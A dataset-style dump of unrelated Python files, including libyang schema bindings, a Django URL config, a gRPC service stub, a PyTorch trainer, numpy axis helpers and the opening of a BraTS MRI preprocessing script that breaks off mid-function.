content (stringlengths 0-894k) | type (stringclasses 2 values)
---|---
def extract_json(html):
|
python
|
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
from awkward._ext import fromjson
from awkward._ext import uproot_issue_90
|
python
|
from django.urls import path
#from account.forms import LoginForm
from django.views.generic.base import TemplateView # new
from . import views
app_name = 'home'
urlpatterns = [
#ex: /roster/
path('', views.index, name='index'),
path('coachhome/<int:pk>', views.coachhome.as_view(template_name='coachhome.html'), name='coachhome'),
path('coachhome/1', views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/2', views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/3', views.coachhome.as_view(template_name='coachhome.html')), # new
path('coachhome/subs', views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/shot', views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/stat', views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/event', views.statEvent, name='statEvent'),
path('coachhome/analytics/<int:pk>', views.analytics.as_view(template_name='analytics.html'), name='analytics'),
]
|
python
|
# Copyright (c) 2018-2019 Robin Jarry
# SPDX-License-Identifier: BSD-3-Clause
from _libyang import ffi
from _libyang import lib
from .util import c2str
from .util import str2c
#------------------------------------------------------------------------------
def schema_in_format(fmt_string):
if fmt_string == 'yang':
return lib.LYS_IN_YANG
if fmt_string == 'yin':
return lib.LYS_IN_YIN
raise ValueError('unknown schema input format: %r' % fmt_string)
#------------------------------------------------------------------------------
def schema_out_format(fmt_string):
if fmt_string == 'yang':
return lib.LYS_OUT_YANG
if fmt_string == 'yin':
return lib.LYS_OUT_YIN
if fmt_string == 'tree':
return lib.LYS_OUT_TREE
if fmt_string == 'info':
return lib.LYS_OUT_INFO
if fmt_string == 'json':
return lib.LYS_OUT_JSON
raise ValueError('unknown schema output format: %r' % fmt_string)
#------------------------------------------------------------------------------
class Module:
def __init__(self, context, module_p):
self.context = context
self._module = module_p
def name(self):
return c2str(self._module.name)
def prefix(self):
return c2str(self._module.prefix)
def description(self):
return c2str(self._module.dsc)
def filepath(self):
return c2str(self._module.filepath)
def implemented(self):
return bool(lib.lypy_module_implemented(self._module))
def feature_enable(self, name):
ret = lib.lys_features_enable(self._module, str2c(name))
if ret != 0:
raise self.context.error('no such feature: %r' % name)
def feature_enable_all(self):
self.feature_enable('*')
def feature_disable(self, name):
ret = lib.lys_features_disable(self._module, str2c(name))
if ret != 0:
raise self.context.error('no such feature: %r' % name)
def feature_disable_all(self):
self.feature_disable('*')
def feature_state(self, name):
ret = lib.lys_features_state(self._module, str2c(name))
if ret < 0:
raise self.context.error('no such feature: %r' % name)
return bool(ret)
def features(self):
for i in range(self._module.features_size):
yield Feature(self.context, self._module.features[i])
def get_feature(self, name):
for f in self.features():
if f.name() == name:
return f
raise self.context.error('no such feature: %r' % name)
def revisions(self):
for i in range(self._module.rev_size):
yield Revision(self.context, self._module.rev[i])
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._module, types=types)
def __str__(self):
return self.name()
def print_mem(self, fmt='tree', path=None):
fmt = schema_out_format(fmt)
buf = ffi.new('char **')
ret = lib.lys_print_mem(buf, self._module, fmt, str2c(path), 0, 0)
if ret != 0:
raise self.context.error('cannot print module')
try:
return c2str(buf[0])
finally:
lib.free(buf[0])
def print_file(self, fileobj, fmt='tree', path=None):
fmt = schema_out_format(fmt)
ret = lib.lys_print_fd(
fileobj.fileno(), self._module, fmt, str2c(path), 0, 0)
if ret != 0:
raise self.context.error('cannot print module')
def parse_data_dict(self, dic, parent=None,
rpc_input=False, rpc_output=False):
"""
Convert a python dictionary to a DNode object following the schema of
this module. The returned value is always a top-level data node (i.e.:
without parent).
:arg dict dic:
The python dictionary to convert.
:arg DNode parent:
Optional parent to update. If not specified a new top-level DNode
will be created.
:arg bool rpc_input:
If True, dic will be parsed by looking in the rpc input nodes.
:arg bool rpc_output:
If True, dic will be parsed by looking in the rpc output nodes.
"""
from .data import dict_to_dnode # circular import
return dict_to_dnode(dic, self, parent=parent,
rpc_input=rpc_input, rpc_output=rpc_output)
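# Hedged usage sketch (not part of the original file; names are illustrative):
#   module = ctx.get_module('example-module')           # assumes a loaded Context
#   dnode = module.parse_data_dict({'hostname': 'r1'})  # returns a top-level DNode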
#------------------------------------------------------------------------------
class Revision:
def __init__(self, context, rev_p):
self.context = context
self._rev = rev_p
def date(self):
return c2str(self._rev.date)
def description(self):
return c2str(self._rev.dsc)
def reference(self):
return c2str(self._rev.ref)
def extensions(self):
for i in range(self._rev.ext_size):
yield Extension(self.context, self._rev.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.date()
#------------------------------------------------------------------------------
class Extension:
def __init__(self, context, ext_p):
self.context = context
self._ext = ext_p
self._def = getattr(ext_p, 'def')
def name(self):
return c2str(self._def.name)
def argument(self):
return c2str(self._ext.arg_value)
def module(self):
module_p = lib.lys_main_module(self._def.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class Type:
DER = lib.LY_TYPE_DER
BINARY = lib.LY_TYPE_BINARY
BITS = lib.LY_TYPE_BITS
BOOL = lib.LY_TYPE_BOOL
DEC64 = lib.LY_TYPE_DEC64
EMPTY = lib.LY_TYPE_EMPTY
ENUM = lib.LY_TYPE_ENUM
IDENT = lib.LY_TYPE_IDENT
INST = lib.LY_TYPE_INST
LEAFREF = lib.LY_TYPE_LEAFREF
STRING = lib.LY_TYPE_STRING
UNION = lib.LY_TYPE_UNION
INT8 = lib.LY_TYPE_INT8
UINT8 = lib.LY_TYPE_UINT8
INT16 = lib.LY_TYPE_INT16
UINT16 = lib.LY_TYPE_UINT16
INT32 = lib.LY_TYPE_INT32
UINT32 = lib.LY_TYPE_UINT32
INT64 = lib.LY_TYPE_INT64
UINT64 = lib.LY_TYPE_UINT64
BASENAMES = {
DER: 'derived',
BINARY: 'binary',
BITS: 'bits',
BOOL: 'boolean',
DEC64: 'decimal64',
EMPTY: 'empty',
ENUM: 'enumeration',
IDENT: 'identityref',
INST: 'instance-id',
LEAFREF: 'leafref',
STRING: 'string',
UNION: 'union',
INT8: 'int8',
UINT8: 'uint8',
INT16: 'int16',
UINT16: 'uint16',
INT32: 'int32',
UINT32: 'uint32',
INT64: 'int64',
UINT64: 'uint64',
}
def __init__(self, context, type_p):
self.context = context
self._type = type_p
def get_bases(self):
if self._type.base == lib.LY_TYPE_DER:
yield from self.derived_type().get_bases()
elif self._type.base == lib.LY_TYPE_LEAFREF:
yield from self.leafref_type().get_bases()
elif self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.get_bases()
else: # builtin type
yield self
def name(self):
if self._type.der:
return c2str(self._type.der.name)
return self.basename()
def description(self):
if self._type.der:
return c2str(self._type.der.dsc)
return None
def base(self):
return self._type.base
def bases(self):
for b in self.get_bases():
yield b.base()
def basename(self):
return self.BASENAMES.get(self._type.base, 'unknown')
def basenames(self):
for b in self.get_bases():
yield b.basename()
def derived_type(self):
if not self._type.der:
return None
return Type(self.context, ffi.addressof(self._type.der.type))
def leafref_type(self):
if self._type.base != self.LEAFREF:
return None
lref = self._type.info.lref
return Type(self.context, ffi.addressof(lref.target.type))
def union_types(self):
if self._type.base != self.UNION:
return
t = self._type
while t.info.uni.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.uni.count):
yield Type(self.context, t.info.uni.types[i])
def enums(self):
if self._type.base != self.ENUM:
return
t = self._type
while t.info.enums.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.enums.count):
e = t.info.enums.enm[i]
yield c2str(e.name), c2str(e.dsc)
def all_enums(self):
for b in self.get_bases():
yield from b.enums()
def bits(self):
if self._type.base != self.BITS:
return
t = self._type
while t.info.bits.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.bits.count):
b = t.info.bits.bit[i]
yield c2str(b.name), c2str(b.dsc)
def all_bits(self):
for b in self.get_bases():
yield from b.bits()
NUM_TYPES = frozenset(
(INT8, INT16, INT32, INT64, UINT8, UINT16, UINT32, UINT64))
def range(self):
if self._type.base in self.NUM_TYPES and self._type.info.num.range:
return c2str(self._type.info.num.range.expr)
elif self._type.base == self.DEC64 and self._type.info.dec64.range:
return c2str(self._type.info.dec64.range.expr)
elif self._type.der:
return self.derived_type().range()
return None
def all_ranges(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_ranges()
else:
rng = self.range()
if rng is not None:
yield rng
def length(self):
if self._type.base == self.STRING and self._type.info.str.length:
return c2str(self._type.info.str.length.expr)
elif self._type.base == self.BINARY and self._type.info.binary.length:
return c2str(self._type.info.binary.length.expr)
elif self._type.der:
return self.derived_type().length()
return None
def all_lengths(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_lengths()
else:
length = self.length()
if length is not None:
yield length
def patterns(self):
if self._type.base != self.STRING:
return
for i in range(self._type.info.str.pat_count):
p = self._type.info.str.patterns[i]
if not p:
continue
# in case of pattern restriction, the first byte has a special
# meaning: 0x06 (ACK) for regular match and 0x15 (NACK) for
# invert-match
invert_match = p.expr[0] == 0x15
# yield tuples like:
# ('[a-zA-Z_][a-zA-Z0-9\-_.]*', False)
# ('[xX][mM][lL].*', True)
yield c2str(p.expr + 1), invert_match
if self._type.der:
yield from self.derived_type().patterns()
def all_patterns(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_patterns()
else:
yield from self.patterns()
def module(self):
module_p = lib.lys_main_module(self._type.der.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def extensions(self):
for i in range(self._type.ext_size):
yield Extension(self.context, self._type.ext[i])
if self._type.parent:
for i in range(self._type.parent.ext_size):
yield Extension(self.context, self._type.parent.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class Feature:
def __init__(self, context, feature_p):
self.context = context
self._feature = feature_p
def name(self):
return c2str(self._feature.name)
def description(self):
return c2str(self._feature.dsc)
def reference(self):
return c2str(self._feature.ref)
def state(self):
return bool(self._feature.flags & lib.LYS_FENABLED)
def deprecated(self):
return bool(self._feature.flags & lib.LYS_STATUS_DEPRC)
def obsolete(self):
return bool(self._feature.flags & lib.LYS_STATUS_OBSLT)
def if_features(self):
for i in range(self._feature.iffeature_size):
yield IfFeatureExpr(self.context, self._feature.iffeature[i])
def module(self):
module_p = lib.lys_main_module(self._feature.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class IfFeatureExpr:
def __init__(self, context, iffeature_p):
self.context = context
self._iffeature = iffeature_p
def _get_operator(self, position):
# the ->exp field is a 2bit array of operator values stored under
# a uint8_t C array.
mask = 0x3 # 2bits mask
shift = 2 * (position % 4)
item = self._iffeature.expr[position // 4]
result = item & (mask << shift)
return result >> shift
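# worked example: the operator at position 5 lives in expr[5 // 4] == expr[1];
# shift = 2 * (5 % 4) == 2, so its value occupies bits 2-3 of that byte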
def _operands(self):
op_index = 0
ft_index = 0
expected = 1
while expected > 0:
operator = self._get_operator(op_index)
op_index += 1
if operator == lib.LYS_IFF_F:
yield IfFeature(self.context, self._iffeature.features[ft_index])
ft_index += 1
expected -= 1
elif operator == lib.LYS_IFF_NOT:
yield IfNotFeature
elif operator == lib.LYS_IFF_AND:
yield IfAndFeatures
expected += 1
elif operator == lib.LYS_IFF_OR:
yield IfOrFeatures
expected += 1
def tree(self):
def _tree(operands):
op = next(operands)
if op is IfNotFeature:
return op(self.context, _tree(operands))
elif op in (IfAndFeatures, IfOrFeatures):
return op(self.context, _tree(operands), _tree(operands))
else:
return op
return _tree(self._operands())
def dump(self):
return self.tree().dump()
def __str__(self):
return str(self.tree()).strip('()')
#------------------------------------------------------------------------------
class IfFeatureExprTree:
def dump(self, indent=0):
raise NotImplementedError()
def __str__(self):
raise NotImplementedError()
#------------------------------------------------------------------------------
class IfFeature(IfFeatureExprTree):
def __init__(self, context, feature_p):
self.context = context
self._feature = feature_p
def feature(self):
return Feature(self.context, self._feature)
def dump(self, indent=0):
feat = self.feature()
return '%s%s [%s]\n' % (' ' * indent, feat.name(), feat.description())
def __str__(self):
return self.feature().name()
#------------------------------------------------------------------------------
class IfNotFeature(IfFeatureExprTree):
def __init__(self, context, child):
self.context = context
self.child = child
def dump(self, indent=0):
return ' ' * indent + 'NOT\n' + self.child.dump(indent + 1)
def __str__(self):
return 'NOT %s' % self.child
#------------------------------------------------------------------------------
class IfAndFeatures(IfFeatureExprTree):
def __init__(self, context, a, b):
self.context = context
self.a = a
self.b = b
def dump(self, indent=0):
s = ' ' * indent + 'AND\n'
s += self.a.dump(indent + 1)
s += self.b.dump(indent + 1)
return s
def __str__(self):
return '%s AND %s' % (self.a, self.b)
#------------------------------------------------------------------------------
class IfOrFeatures(IfFeatureExprTree):
def __init__(self, context, a, b):
self.context = context
self.a = a
self.b = b
def dump(self, indent=0):
s = ' ' * indent + 'OR\n'
s += self.a.dump(indent + 1)
s += self.b.dump(indent + 1)
return s
def __str__(self):
return '(%s OR %s)' % (self.a, self.b)
#------------------------------------------------------------------------------
class SNode:
CONTAINER = lib.LYS_CONTAINER
LEAF = lib.LYS_LEAF
LEAFLIST = lib.LYS_LEAFLIST
LIST = lib.LYS_LIST
RPC = lib.LYS_RPC
INPUT = lib.LYS_INPUT
OUTPUT = lib.LYS_OUTPUT
KEYWORDS = {
CONTAINER: 'container',
LEAF: 'leaf',
LEAFLIST: 'leaf-list',
LIST: 'list',
RPC: 'rpc',
INPUT: 'input',
OUTPUT: 'output',
}
def __init__(self, context, node_p):
self.context = context
self._node = node_p
def nodetype(self):
return self._node.nodetype
def keyword(self):
return self.KEYWORDS.get(self._node.nodetype, '???')
def name(self):
return c2str(self._node.name)
def fullname(self):
return '%s:%s' % (self.module().name(), self.name())
def description(self):
return c2str(self._node.dsc)
def config_set(self):
return bool(self._node.flags & lib.LYS_CONFIG_SET)
def config_false(self):
return bool(self._node.flags & lib.LYS_CONFIG_R)
def mandatory(self):
return bool(self._node.flags & lib.LYS_MAND_TRUE)
def deprecated(self):
return bool(self._node.flags & lib.LYS_STATUS_DEPRC)
def obsolete(self):
return bool(self._node.flags & lib.LYS_STATUS_OBSLT)
def status(self):
if self._node.flags & lib.LYS_STATUS_DEPRC:
return 'deprecated'
elif self._node.flags & lib.LYS_STATUS_OBSLT:
return 'obsolete'
return 'current'
def module(self):
module_p = lib.lys_node_module(self._node)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def schema_path(self):
try:
s = lib.lys_path(self._node, 0)
return c2str(s)
finally:
lib.free(s)
def data_path(self, key_placeholder="'%s'"):
try:
s = lib.lys_data_path_pattern(self._node, str2c(key_placeholder))
return c2str(s)
finally:
lib.free(s)
def extensions(self):
for i in range(self._node.ext_size):
yield Extension(self.context, self._node.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def if_features(self):
for i in range(self._node.iffeature_size):
yield IfFeatureExpr(self.context, self._node.iffeature[i])
def parent(self):
parent_p = lib.lys_parent(self._node)
while parent_p and parent_p.nodetype not in SNode.NODETYPE_CLASS:
parent_p = lib.lys_parent(parent_p)
if parent_p:
return SNode.new(self.context, parent_p)
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
def parse_data_dict(self, dic, parent=None,
rpc_input=False, rpc_output=False):
"""
Convert a python dictionary to a DNode object following the schema of
this module. The returned value is always a top-level data node (i.e.:
without parent).
:arg dict dic:
The python dictionary to convert.
:arg DNode parent:
Optional parent to update. If not specified a new top-level DNode
will be created.
:arg bool rpc_input:
If True, dic will be parsed by looking in the rpc input nodes.
:arg bool rpc_output:
If True, dic will be parsed by looking in the rpc output nodes.
"""
from .data import dict_to_dnode # circular import
return dict_to_dnode(dic, self, parent=parent,
rpc_input=rpc_input, rpc_output=rpc_output)
NODETYPE_CLASS = {}
@classmethod
def register(cls, nodetype):
def _decorator(nodeclass):
cls.NODETYPE_CLASS[nodetype] = nodeclass
return nodeclass
return _decorator
@classmethod
def new(cls, context, node_p):
nodecls = cls.NODETYPE_CLASS.get(node_p.nodetype, SNode)
return nodecls(context, node_p)
#------------------------------------------------------------------------------
@SNode.register(SNode.LEAF)
class SLeaf(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._leaf = ffi.cast('struct lys_node_leaf *', node_p)
def default(self):
return c2str(self._leaf.dflt)
def units(self):
return c2str(self._leaf.units)
def type(self):
return Type(self.context, ffi.addressof(self._leaf.type))
def is_key(self):
if lib.lys_is_key(self._leaf, ffi.NULL):
return True
return False
def must_conditions(self):
for i in range(self._leaf.must_size):
yield c2str(self._leaf.must[i].expr)
def __str__(self):
return '%s %s' % (self.name(), self.type().name())
#------------------------------------------------------------------------------
@SNode.register(SNode.LEAFLIST)
class SLeafList(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._leaflist = ffi.cast('struct lys_node_leaflist *', node_p)
def ordered(self):
return bool(self._node.flags & lib.LYS_USERORDERED)
def units(self):
return c2str(self._leaflist.units)
def type(self):
return Type(self.context, ffi.addressof(self._leaflist.type))
def defaults(self):
for i in range(self._leaflist.dflt_size):
yield c2str(self._leaflist.dflt[i])
def must_conditions(self):
for i in range(self._leaflist.must_size):
yield c2str(self._leaflist.must[i].expr)
def __str__(self):
return '%s %s' % (self.name(), self.type().name())
#------------------------------------------------------------------------------
@SNode.register(SNode.CONTAINER)
class SContainer(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._container = ffi.cast('struct lys_node_container *', node_p)
def presence(self):
return c2str(self._container.presence)
def must_conditions(self):
for i in range(self._container.must_size):
yield c2str(self._container.must[i].expr)
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
@SNode.register(SNode.LIST)
class SList(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._list = ffi.cast('struct lys_node_list *', node_p)
def ordered(self):
return bool(self._node.flags & lib.LYS_USERORDERED)
def __iter__(self):
return self.children()
def children(self, skip_keys=False, types=None):
return iter_children(
self.context, self._node, skip_keys=skip_keys, types=types)
def keys(self):
for i in range(self._list.keys_size):
node = ffi.cast('struct lys_node *', self._list.keys[i])
yield SLeaf(self.context, node)
def must_conditions(self):
for i in range(self._list.must_size):
yield c2str(self._list.must[i].expr)
def __str__(self):
return '%s [%s]' % (
self.name(), ', '.join(k.name() for k in self.keys()))
#------------------------------------------------------------------------------
@SNode.register(SNode.INPUT)
@SNode.register(SNode.OUTPUT)
class SRpcInOut(SNode):
def __iter__(self):
return self.children()
def must_conditions(self):
return ()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
@SNode.register(SNode.RPC)
class SRpc(SNode):
def must_conditions(self):
return ()
def input(self):
try:
return next(iter_children(
self.context, self._node, types=(self.INPUT,),
options=lib.LYS_GETNEXT_WITHINOUT))
except StopIteration:
return None
def output(self):
try:
return next(iter_children(
self.context, self._node, types=(self.OUTPUT,),
options=lib.LYS_GETNEXT_WITHINOUT))
except StopIteration:
return None
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
def iter_children(context, parent, skip_keys=False, types=None, options=0):
if types is None:
types = (lib.LYS_CONTAINER, lib.LYS_LIST, lib.LYS_RPC,
lib.LYS_LEAF, lib.LYS_LEAFLIST)
def _skip(node):
if node.nodetype not in types:
return True
if not skip_keys:
return False
if node.nodetype != lib.LYS_LEAF:
return False
leaf = ffi.cast('struct lys_node_leaf *', node)
if lib.lys_is_key(leaf, ffi.NULL):
return True
return False
if ffi.typeof(parent) == ffi.typeof('struct lys_module *'):
module = parent
parent = ffi.NULL
else:
module = ffi.NULL
child = lib.lys_getnext(ffi.NULL, parent, module, options)
while child:
if not _skip(child):
yield SNode.new(context, child)
child = lib.lys_getnext(child, parent, module, options)
#------------------------------------------------------------------------------
# compat
Container = SContainer
Leaf = SLeaf
LeafList = SLeafList
List = SList
Node = SNode
Rpc = SRpc
RpcInOut = SRpcInOut
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v1.proto.resources import language_constant_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2
from google.ads.google_ads.v1.proto.services import language_constant_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2
class LanguageConstantServiceStub(object):
"""Service to fetch language constants.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetLanguageConstant = channel.unary_unary(
'/google.ads.googleads.v1.services.LanguageConstantService/GetLanguageConstant',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.FromString,
)
class LanguageConstantServiceServicer(object):
"""Service to fetch language constants.
"""
def GetLanguageConstant(self, request, context):
"""Returns the requested language constant.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LanguageConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetLanguageConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetLanguageConstant,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.LanguageConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
python
|
import logging
from torch.utils.tensorboard import SummaryWriter
from utils.utils_common import DataModes
import torch
logger = logging.getLogger(__name__)
class Trainer(object):
def training_step(self, data, epoch):
# Get the minibatch
x, y = data
self.optimizer.zero_grad()
loss, log = self.net.loss(x, y)
loss.backward()
self.optimizer.step()
return log
def __init__(self, net, trainloader, optimizer, epoch_count, eval_every, save_path, evaluator, log_msg):
self.net = net
self.trainloader = trainloader
self.optimizer = optimizer
self.numb_of_epochs = epoch_count
self.eval_every = eval_every
self.save_path = save_path
self.evaluator = evaluator
self.log_msg = log_msg
def train(self):
logger.info("Start training...")
writer = SummaryWriter(self.save_path)
for epoch in range(self.numb_of_epochs): # loop over the dataset multiple times
running_loss = {}
for data in self.trainloader:
# training step
loss = self.training_step(data, epoch)
# print statistics
for key, value in loss.items():
running_loss[key] = (running_loss[key] + value) if key in running_loss else value
if epoch % self.eval_every == self.eval_every-1: # print every K epochs
logger.info('epoch: {}, tr_loss: {:.4f}'.format(epoch, running_loss['loss'] / self.eval_every))
for key, value in running_loss.items():
writer.add_scalar(DataModes.TRAINING + '/' + key, value, epoch)
self.evaluator.evaluate(epoch, writer)
running_loss = {}
logger.info("... end of training!")
|
python
|
from datetime import datetime
from . import db, ma
class NRNumber(db.Model):
__tablename__ = 'nr_number'
# core fields
id = db.Column(db.Integer, primary_key=True)
nrNum = db.Column('nr_num', db.String(10), unique=True)
lastUpdate = db.Column('last_update', db.DateTime(timezone=True), default=datetime.utcnow, onupdate=datetime.utcnow)
@classmethod
def get_next_nr_num(cls, last_nr):
last_nr_header = last_nr[0:4]
last_number = last_nr[4:10]
if last_number == '999999':
# the numeric part is exhausted: advance the final letter of the header to the
# next letter in the alphabet and restart the counter
next_nr_header = last_nr_header[:-1] + chr(ord(last_nr_header[-1]) + 1)
next_number = '000000'
else:
next_nr_header = last_nr_header
next_number = str((int(last_number) + 1)).zfill(6)
next_nr_num = next_nr_header + next_number
return (next_nr_num)
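# Worked example (hypothetical NR values, consistent with the rollover logic above):
#   get_next_nr_num('NRAA000123') -> 'NRAA000124'
#   get_next_nr_num('NRAA999999') -> 'NRAB000000'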
def json(self):
return {'id': self.id,
'nrNum': self.nrNum
}
def save_to_db(self):
db.session.add(self)
db.session.commit()
class NRNumberSchema(ma.ModelSchema):
class Meta:
model = NRNumber
|
python
|
"""
This module provides some helper methods to deal with multidimensional arrays of different axes order.
"""
import numpy as np
def adjustOrder(volume, inputAxes, outputAxes="txyzc"):
"""
Convert the given `volume` (whose axis ordering is described by `inputAxes`)
into a different axis ordering, specified by the `outputAxes` string (e.g. "xyzt").
Allowed axes are `t`, `x`, `y`, `z`, `c`.
The default output format is "txyzc"; axes that are missing in the input
volume are created with size 1.
"""
assert isinstance(volume, np.ndarray)
assert len(volume.shape) == len(inputAxes)
assert len(outputAxes) >= len(inputAxes)
assert not any(a not in "txyzc" for a in outputAxes)
assert not any(a not in "txyzc" for a in inputAxes)
outVolume = volume
# find present and missing axes
positions = {}
missingAxes = []
for axis in outputAxes:
try:
positions[axis] = inputAxes.index(axis)
except ValueError:
missingAxes.append(axis)
# insert missing axes at the end
for m in missingAxes:
outVolume = np.expand_dims(outVolume, axis=-1)
positions[m] = outVolume.ndim - 1
# transpose
axesRemapping = [positions[a] for a in outputAxes]
outVolume = np.transpose(outVolume, axes=axesRemapping)
return outVolume
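# Illustrative example (not in the original file): a (10, 200, 300) "txy" volume
# gains singleton z and c axes while keeping the t/x/y extents unchanged:
#   vol = np.zeros((10, 200, 300))
#   adjustOrder(vol, "txy").shape  # -> (10, 200, 300, 1, 1)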
def getFrameSlicing(inputAxes, selectValue, selectAxis="t"):
"""
Build a slicing tuple for a multidimensional array with the specified `inputAxes`,
where an index (or a list of indices, or a slice object) is given for exactly one axis (`selectAxis`).
Example: `myarray[getFrameSlicing('xzt', 3, 't')]`
Example: `myarray[getFrameSlicing('xzt', [3,7,9], 't')]`
"""
assert len(selectAxis) == 1
assert inputAxes.count(selectAxis) == 1
slicing = tuple()
for a in inputAxes:
if a == selectAxis:
slicing += (selectValue,)
else:
slicing += (slice(None),)
return slicing
|
python
|
from keras.models import load_model
from glob import glob
import keras
import numpy as np
from losses import *
import random
from keras.models import Model
from extract_patches import Pipeline
from scipy.misc import imresize
from keras.utils import np_utils
import SimpleITK as sitk
import pdb
import matplotlib.pyplot as plt
import os
from scipy.ndimage.measurements import label
import cv2
from scipy.ndimage.morphology import binary_dilation, generate_binary_structure
import matplotlib.gridspec as gridspec
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug import parameters as iap
# from evaluation_metrics import *
path_HGG = glob('/home/pi/Projects/beyondsegmentation/HGG/**')
path_LGG = glob('/home/pi/Projects/beyondsegmentation/LGG**')
test_path=glob('/home/parth/Interpretable_ML/BraTS_2018/val/**')
np.random.seed(2022)
np.random.shuffle(test_path)
def normalize_scheme(slice_not):
'''
normalizes each slice, excluding gt
subtracts mean and div by std dev for each slice
clips top and bottom one percent of pixel intensities
'''
normed_slices = np.zeros(( 4,155, 240, 240))
for slice_ix in range(4):
normed_slices[slice_ix] = slice_not[slice_ix]
for mode_ix in range(155):
normed_slices[slice_ix][mode_ix] = _normalize(slice_not[slice_ix][mode_ix])
return normed_slices
def _normalize(slice):
b = np.percentile(slice, 99)
t = np.percentile(slice, 1)
slice = np.clip(slice, t, b)
image_nonzero = slice[np.nonzero(slice)]
if np.std(slice)==0 or np.std(image_nonzero) == 0:
return slice
else:
tmp= (slice - np.mean(image_nonzero)) / np.std(image_nonzero)
tmp[tmp==tmp.min()]=-9
return tmp
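# Quick sanity check (illustrative values only, not from the original script):
#   s = np.random.rand(240, 240) * 100.0
#   out = _normalize(s)
#   # nonzero voxels of `out` are approximately zero-mean / unit-std,
#   # and the minimum value is flagged as -9 to mark the background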
def load_vol(filepath_image, model_type, slice_):
'''
load and preprocess one input volume
INPUT (1) str 'filepath_image': directory containing the patient's scans
(2) str 'model_type': 'dense' pads each slice with an 8-pixel border
(3) int 'slice_': index of the axial slice to extract
OUTPUT (1) np array of the preprocessed image slice
(2) np array of the corresponding ground truth slice
'''
#read the volume
flair = glob( filepath_image + '/*_flair.nii.gz')
t2 = glob( filepath_image + '/*_t2.nii.gz')
gt = glob( filepath_image + '/*_seg.nii.gz')
t1s = glob( filepath_image + '/*_t1.nii.gz')
t1c = glob( filepath_image + '/*_t1ce.nii.gz')
t1=[scan for scan in t1s if scan not in t1c]
if (len(flair)+len(t2)+len(gt)+len(t1)+len(t1c))<5:
print("there is a problem here!!! some modality is missing for this patient: " + filepath_image)
scans_test = [flair[0], t1[0], t1c[0], t2[0], gt[0]]
test_im = [sitk.GetArrayFromImage(sitk.ReadImage(scans_test[i])) for i in range(len(scans_test))]
test_im=np.array(test_im).astype(np.float32)
test_image = test_im[0:4]
gt=test_im[-1]
gt[gt==4]=3
#normalize each slice following the same scheme used for training
test_image = normalize_scheme(test_image)
